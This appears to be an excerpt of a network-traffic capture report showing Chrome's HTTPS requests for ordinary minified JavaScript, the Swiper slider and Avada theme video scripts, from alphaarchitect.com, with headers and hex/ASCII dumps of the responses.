                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-24185"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba210f6bef9f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC876INData Raw: 37 64 63 33 0d 0a 76 61 72 20 53 77 69 70 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 69 6e 20 65 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 4f 62 6a 65 63 74 7d 66 75 6e 63 74 69 6f 6e 20 74 28 73 2c 61 29 7b 76 6f 69 64 20 30 3d 3d 3d 73 26 26 28 73 3d 7b 7d 29 2c 76 6f 69 64 20 30 3d 3d 3d 61 26 26 28 61 3d 7b 7d 29 2c 4f 62 6a 65 63 74 2e 6b 65 79 73 28 61 29 2e 66 6f 72 45 61 63 68 28 69 3d 3e 7b 76 6f 69 64 20 30 3d 3d 3d 73 5b 69 5d 3f 73 5b 69 5d 3d 61 5b 69 5d 3a 65 28 61 5b 69 5d 29 26 26 65 28 73 5b 69 5d 29
                                                                                                                                                                                                                                                                        Data Ascii: 7dc3var Swiper=function(){"use strict";function e(e){return null!==e&&"object"==typeof e&&"constructor"in e&&e.constructor===Object}function t(s,a){void 0===s&&(s={}),void 0===a&&(a={}),Object.keys(a).forEach(i=>{void 0===s[i]?s[i]=a[i]:e(a[i])&&e(s[i])
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 68 61 73 68 3a 22 22 2c 68 6f 73 74 3a 22 22 2c 68 6f 73 74 6e 61 6d 65 3a 22 22 2c 68 72 65 66 3a 22 22 2c 6f 72 69 67 69 6e 3a 22 22 2c 70 61 74 68 6e 61 6d 65 3a 22 22 2c 70 72 6f 74 6f 63 6f 6c 3a 22 22 2c 73 65 61 72 63 68 3a 22 22 7d 2c 68 69 73 74 6f 72 79 3a 7b 72 65 70 6c 61 63 65 53 74 61 74 65 28 29 7b 7d 2c 70 75 73 68 53 74 61 74 65 28 29 7b 7d 2c 67 6f 28 29 7b 7d 2c 62 61 63 6b 28 29 7b 7d 7d 2c 43 75 73 74 6f 6d 45 76 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 29 7b 7d 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 29 7b 7d 2c 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 3a 28 29 3d 3e 28 7b 67 65 74 50 72 6f 70 65 72 74 79 56 61
                                                                                                                                                                                                                                                                        Data Ascii: hash:"",host:"",hostname:"",href:"",origin:"",pathname:"",protocol:"",search:""},history:{replaceState(){},pushState(){},go(){},back(){}},CustomEvent:function(){return this},addEventListener(){},removeEventListener(){},getComputedStyle:()=>({getPropertyVa
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 3f 70 61 72 73 65 46 6c 6f 61 74 28 61 5b 31 32 5d 29 3a 70 61 72 73 65 46 6c 6f 61 74 28 61 5b 34 5d 29 29 2c 22 79 22 3d 3d 3d 74 26 26 28 69 3d 73 2e 57 65 62 4b 69 74 43 53 53 4d 61 74 72 69 78 3f 6e 2e 6d 34 32 3a 31 36 3d 3d 3d 61 2e 6c 65 6e 67 74 68 3f 70 61 72 73 65 46 6c 6f 61 74 28 61 5b 31 33 5d 29 3a 70 61 72 73 65 46 6c 6f 61 74 28 61 5b 35 5d 29 29 2c 69 7c 7c 30 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 6e 75 6c 6c 21 3d 3d 65 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 22 4f 62 6a 65 63 74 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 7d 66 75 6e 63 74
                                                                                                                                                                                                                                                                        Data Ascii: ?parseFloat(a[12]):parseFloat(a[4])),"y"===t&&(i=s.WebKitCSSMatrix?n.m42:16===a.length?parseFloat(a[13]):parseFloat(a[5])),i||0}function c(e){return"object"==typeof e&&null!==e&&e.constructor&&"Object"===Object.prototype.toString.call(e).slice(8,-1)}funct
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 2e 77 72 61 70 70 65 72 45 6c 2e 73 63 72 6f 6c 6c 54 6f 28 7b 5b 61 5d 3a 63 7d 29 2c 70 28 63 2c 73 29 29 72 65 74 75 72 6e 20 74 2e 77 72 61 70 70 65 72 45 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 74 2e 77 72 61 70 70 65 72 45 6c 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 53 6e 61 70 54 79 70 65 3d 22 22 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 2e 77 72 61 70 70 65 72 45 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 22 2c 74 2e 77 72 61 70 70 65 72 45 6c 2e 73 63 72 6f 6c 6c 54 6f 28 7b 5b 61 5d 3a 63 7d 29 7d 29 2c 76 6f 69 64 20 69 2e 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 74 2e 63 73 73 4d 6f 64 65 46 72 61 6d 65 49 44 29 3b 74 2e 63 73 73 4d 6f 64 65 46 72 61 6d 65 49 44
                                                                                                                                                                                                                                                                        Data Ascii: .wrapperEl.scrollTo({[a]:c}),p(c,s))return t.wrapperEl.style.overflow="hidden",t.wrapperEl.style.scrollSnapType="",setTimeout(()=>{t.wrapperEl.style.overflow="",t.wrapperEl.scrollTo({[a]:c})}),void i.cancelAnimationFrame(t.cssModeFrameID);t.cssModeFrameID
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 69 64 74 68 22 3d 3d 3d 74 3f 22 6f 66 66 73 65 74 57 69 64 74 68 22 3a 22 6f 66 66 73 65 74 48 65 69 67 68 74 22 5d 2b 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 77 69 64 74 68 22 3d 3d 3d 74 3f 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 3a 22 6d 61 72 67 69 6e 2d 74 6f 70 22 29 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 77 69 64 74 68 22 3d 3d 3d 74 3f 22 6d 61 72 67 69 6e 2d 6c 65 66 74 22 3a 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 22 29 29 3a 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7d 66 75 6e 63 74
                                                                                                                                                                                                                                                                        Data Ascii: idth"===t?"offsetWidth":"offsetHeight"]+parseFloat(a.getComputedStyle(e,null).getPropertyValue("width"===t?"margin-right":"margin-top"))+parseFloat(a.getComputedStyle(e,null).getPropertyValue("width"===t?"margin-left":"margin-bottom")):e.offsetWidth}funct
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 64 65 78 4f 66 28 22 73 61 66 61 72 69 22 29 3e 3d 30 26 26 74 2e 69 6e 64 65 78 4f 66 28 22 63 68 72 6f 6d 65 22 29 3c 30 26 26 74 2e 69 6e 64 65 78 4f 66 28 22 61 6e 64 72 6f 69 64 22 29 3c 30 7d 69 66 28 61 28 29 29 7b 63 6f 6e 73 74 20 74 3d 53 74 72 69 6e 67 28 65 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3b 69 66 28 74 2e 69 6e 63 6c 75 64 65 73 28 22 56 65 72 73 69 6f 6e 2f 22 29 29 7b 63 6f 6e 73 74 5b 65 2c 61 5d 3d 74 2e 73 70 6c 69 74 28 22 56 65 72 73 69 6f 6e 2f 22 29 5b 31 5d 2e 73 70 6c 69 74 28 22 20 22 29 5b 30 5d
                                                                                                                                                                                                                                                                        Data Ascii: ;function a(){const t=e.navigator.userAgent.toLowerCase();return t.indexOf("safari")>=0&&t.indexOf("chrome")<0&&t.indexOf("android")<0}if(a()){const t=String(e.navigator.userAgent);if(t.includes("Version/")){const[e,a]=t.split("Version/")[1].split(" ")[0]
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 29 2c 69 3d 65 2e 61 63 74 69 76 65 49 6e 64 65 78 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 67 72 69 64 26 26 65 2e 70 61 72 61 6d 73 2e 67 72 69 64 2e 72 6f 77 73 3e 31 29 7b 63 6f 6e 73 74 20 73 3d 69 2c 72 3d 5b 73 2d 74 5d 3b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 2e 2e 2e 41 72 72 61 79 2e 66 72 6f 6d 28 7b 6c 65 6e 67 74 68 3a 74 7d 29 2e 6d 61 70 28 28 65 2c 74 29 3d 3e 73 2b 61 2b 74 29 29 2c 76 6f 69 64 20 65 2e 73 6c 69 64 65 73 2e 66 6f 72 45 61 63 68 28 28 74 2c 73 29 3d 3e 7b 72 2e 69 6e 63 6c 75 64 65 73 28 74 2e 63 6f 6c 75 6d 6e 29 26 26 6b 28 65 2c 73 29 7d 29 7d 63 6f 6e 73 74 20 72 3d 69 2b 61 2d 31 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 72 65 77 69 6e 64 7c 7c 65 2e 70 61 72 61 6d 73 2e 6c 6f 6f 70 29 66 6f 72 28 6c 65 74 20 61 3d 69
                                                                                                                                                                                                                                                                        Data Ascii: ),i=e.activeIndex;if(e.params.grid&&e.params.grid.rows>1){const s=i,r=[s-t];return r.push(...Array.from({length:t}).map((e,t)=>s+a+t)),void e.slides.forEach((t,s)=>{r.includes(t.column)&&k(e,s)})}const r=i+a-1;if(e.params.rewind||e.params.loop)for(let a=i
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 2e 72 65 61 6c 49 6e 64 65 78 2c 30 2c 21 31 2c 21 30 29 3a 65 2e 73 6c 69 64 65 54 6f 28 65 2e 61 63 74 69 76 65 49 6e 64 65 78 2c 30 2c 21 31 2c 21 30 29 3a 65 2e 73 6c 69 64 65 54 6f 28 65 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 2d 31 2c 30 2c 21 31 2c 21 30 29 2c 65 2e 61 75 74 6f 70 6c 61 79 26 26 65 2e 61 75 74 6f 70 6c 61 79 2e 72 75 6e 6e 69 6e 67 26 26 65 2e 61 75 74 6f 70 6c 61 79 2e 70 61 75 73 65 64 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 2e 61 75 74 6f 70 6c 61 79 2e 72 65 73 69 7a 65 54 69 6d 65 6f 75 74 29 2c 65 2e 61 75 74 6f 70 6c 61 79 2e 72 65 73 69 7a 65 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 65 2e 61 75 74 6f 70 6c 61 79 26 26 65 2e 61 75 74 6f 70 6c 61 79 2e 72 75 6e 6e 69 6e 67 26 26 65
                                                                                                                                                                                                                                                                        Data Ascii: .realIndex,0,!1,!0):e.slideTo(e.activeIndex,0,!1,!0):e.slideTo(e.slides.length-1,0,!1,!0),e.autoplay&&e.autoplay.running&&e.autoplay.paused&&(clearTimeout(e.autoplay.resizeTimeout),e.autoplay.resizeTimeout=setTimeout(()=>{e.autoplay&&e.autoplay.running&&e
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 74 65 22 2c 48 2c 21 30 29 2c 72 5b 64 5d 28 22 6c 6f 61 64 22 2c 65 2e 6f 6e 4c 6f 61 64 2c 7b 63 61 70 74 75 72 65 3a 21 30 7d 29 7d 2c 58 3d 28 65 2c 74 29 3d 3e 65 2e 67 72 69 64 26 26 74 2e 67 72 69 64 26 26 74 2e 67 72 69 64 2e 72 6f 77 73 3e 31 3b 76 61 72 20 42 3d 7b 69 6e 69 74 3a 21 30 2c 64 69 72 65 63 74 69 6f 6e 3a 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 6f 6e 65 57 61 79 4d 6f 76 65 6d 65 6e 74 3a 21 31 2c 73 77 69 70 65 72 45 6c 65 6d 65 6e 74 4e 6f 64 65 4e 61 6d 65 3a 22 53 57 49 50 45 52 2d 43 4f 4e 54 41 49 4e 45 52 22 2c 74 6f 75 63 68 45 76 65 6e 74 73 54 61 72 67 65 74 3a 22 77 72 61 70 70 65 72 22 2c 69 6e 69 74 69 61 6c 53 6c 69 64 65 3a 30 2c 73 70 65 65 64 3a 33 30 30 2c 63 73 73 4d 6f 64 65 3a 21 31 2c 75 70 64 61 74 65 4f 6e 57
                                                                                                                                                                                                                                                                        Data Ascii: te",H,!0),r[d]("load",e.onLoad,{capture:!0})},X=(e,t)=>e.grid&&t.grid&&t.grid.rows>1;var B={init:!0,direction:"horizontal",oneWayMovement:!1,swiperElementNodeName:"SWIPER-CONTAINER",touchEventsTarget:"wrapper",initialSlide:0,speed:300,cssMode:!1,updateOnW
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 73 3a 21 30 2c 6c 6f 6f 70 41 64 64 69 74 69 6f 6e 61 6c 53 6c 69 64 65 73 3a 30 2c 6c 6f 6f 70 50 72 65 76 65 6e 74 73 53 6c 69 64 69 6e 67 3a 21 30 2c 72 65 77 69 6e 64 3a 21 31 2c 61 6c 6c 6f 77 53 6c 69 64 65 50 72 65 76 3a 21 30 2c 61 6c 6c 6f 77 53 6c 69 64 65 4e 65 78 74 3a 21 30 2c 73 77 69 70 65 48 61 6e 64 6c 65 72 3a 6e 75 6c 6c 2c 6e 6f 53 77 69 70 69 6e 67 3a 21 30 2c 6e 6f 53 77 69 70 69 6e 67 43 6c 61 73 73 3a 22 73 77 69 70 65 72 2d 6e 6f 2d 73 77 69 70 69 6e 67 22 2c 6e 6f 53 77 69 70 69 6e 67 53 65 6c 65 63 74 6f 72 3a 6e 75 6c 6c 2c 70 61 73 73 69 76 65 4c 69 73 74 65 6e 65 72 73 3a 21 30 2c 6d 61 78 42 61 63 6b 66 61 63 65 48 69 64 64 65 6e 53 6c 69 64 65 73 3a 31 30 2c 63 6f 6e 74 61 69 6e 65 72 4d 6f 64 69 66 69 65 72 43 6c 61 73 73
                                                                                                                                                                                                                                                                        Data Ascii: s:!0,loopAdditionalSlides:0,loopPreventsSliding:!0,rewind:!1,allowSlidePrev:!0,allowSlideNext:!0,swipeHandler:null,noSwiping:!0,noSwipingClass:"swiper-no-swiping",noSwipingSelector:null,passiveListeners:!0,maxBackfaceHiddenSlides:10,containerModifierClass


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        120192.168.2.449878141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC629OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-general.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-d30"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba21086e42c3-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC878INData Raw: 64 33 30 0d 0a 66 75 6e 63 74 69 6f 6e 20 70 6c 61 79 56 69 64 65 6f 41 6e 64 50 61 75 73 65 4f 74 68 65 72 73 28 65 29 7b 76 61 72 20 69 3d 6a 51 75 65 72 79 28 65 29 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 2c 74 3d 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 66 6c 65 78 73 6c 69 64 65 72 22 29 2e 73 6c 69 64 65 73 2e 65 71 28 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 66 6c 65 78 73 6c 69 64 65 72 22 29 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 29 2c 6f 3d 74 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 22 29 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 3b 69 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                        Data Ascii: d30function playVideoAndPauseOthers(e){var i=jQuery(e).find("[data-youtube-video-id]").find("iframe"),t=jQuery(e).data("flexslider").slides.eq(jQuery(e).data("flexslider").currentSlide),o=t.find("[data-youtube-video-id]").find("iframe");i.each(function(
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 3d 3d 3d 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 61 6e 69 6d 61 74 69 6f 6e 22 29 26 26 30 3d 3d 3d 65 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 26 26 76 6f 69 64 20 30 3d 3d 3d 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 69 74 65 72 61 74 69 6f 6e 22 29 3f 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 6f 2e 61 74 74 72 28 22 69 64 22 29 5d 26 26 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 6f 2e 61 74 74 72 28 22 69 64 22 29 5d 2e 70 6c 61 79 56 69 64 65 6f 28 29 2c 6a 51 75 65 72 79 28 65 29 2e 64 61 74 61 28 22 69 74 65 72 61 74 69 6f 6e 22 2c 31 29 2c 65 2e 73 74 6f 70 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74
                                                                                                                                                                                                                                                                        Data Ascii: ===jQuery(e).data("animation")&&0===e.currentSlide&&void 0===jQuery(e).data("iteration")?window.$youtube_players[o.attr("id")]&&setTimeout(function(){window.$youtube_players[o.attr("id")].playVideo(),jQuery(e).data("iteration",1),e.stop(),setTimeout(funct
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1136INData Raw: 22 29 26 26 22 79 65 73 22 3d 3d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 6c 69 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 22 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 28 74 68 69 73 29 5b 30 5d 2e 70 6c 61 79 26 26 6a 51 75 65 72 79 28 74 68 69 73 29 5b 30 5d 2e 70 6c 61 79 28 29 7d 29 7d 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 65 3d 6a 51 75 65 72 79 28 22 69 66 72 61 6d 65 22 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 73 72 63 22 29 2c 6f 3d 6a 51 75 65 72 79 28
                                                                                                                                                                                                                                                                        Data Ascii: ")&&"yes"===jQuery(this).parents("li").attr("data-autoplay")&&"function"==typeof jQuery(this)[0].play&&jQuery(this)[0].play()})}jQuery(document).ready(function(){var e;e=jQuery("iframe"),jQuery.each(e,function(e,i){var t=jQuery(this).attr("src"),o=jQuery(
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        121192.168.2.449879141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC624OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-bg.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-11ee"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba210a4e1849-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC877INData Raw: 31 31 65 65 0d 0a 76 61 72 20 24 79 6f 75 74 75 62 65 42 47 56 69 64 65 6f 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 66 62 52 6f 77 47 65 74 41 6c 6c 45 6c 65 6d 65 6e 74 73 57 69 74 68 41 74 74 72 69 62 75 74 65 28 65 29 7b 76 61 72 20 74 2c 69 2c 6f 3d 5b 5d 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 3b 66 6f 72 28 74 3d 30 2c 69 3d 61 2e 6c 65 6e 67 74 68 3b 74 3c 69 3b 74 2b 2b 29 61 5b 74 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 65 29 26 26 21 6a 51 75 65 72 79 28 61 5b 74 5d 29 2e 70 61 72 65 6e 74 73 28 22 2e 74 66 73 2d 73 6c 69 64 65 72 22 29 2e 6c 65 6e 67 74 68 26 26 6f 2e 70 75 73 68 28 61 5b 74 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 5f 66 62 52
                                                                                                                                                                                                                                                                        Data Ascii: 11eevar $youtubeBGVideos={};function _fbRowGetAllElementsWithAttribute(e){var t,i,o=[],a=document.getElementsByTagName("*");for(t=0,i=a.length;t<i;t++)a[t].getAttribute(e)&&!jQuery(a[t]).parents(".tfs-slider").length&&o.push(a[t]);return o}function _fbR
                                                                                                                                                                                                                                                                        2024-12-20 12:45:01 UTC1369INData Raw: 51 75 65 72 79 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 3d 22 2b 65 2e 74 61 72 67 65 74 2e 67 65 74 56 69 64 65 6f 44 61 74 61 28 29 2e 76 69 64 65 6f 5f 69 64 2b 22 5d 22 29 2e 64 61 74 61 28 22 6c 6f 6f 70 22 29 26 26 65 2e 74 61 72 67 65 74 2e 73 65 65 6b 54 6f 28 30 29 29 3a 65 2e 64 61 74 61 3d 3d 3d 59 54 2e 50 6c 61 79 65 72 53 74 61 74 65 2e 50 4c 41 59 49 4e 47 26 26 6a 51 75 65 72 79 28 65 2e 74 61 72 67 65 74 2e 67 65 74 49 66 72 61 6d 65 28 29 29 2e 70 61 72 65 6e 74 28 29 2e 63 73 73 28 22 6f 70 61 63 69 74 79 22 2c 22 31 22 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 73 69 7a 65 56 69 64 65 6f 28 65 29 7b 76 61 72 20 74 2c 69 2c 6f 2c 61 2c 64 2c 6e 2c 72 2c 73 2c 75 2c 66 2c 76 2c 63 2c 6d 2c 6c 2c 70 2c 79 3d 65
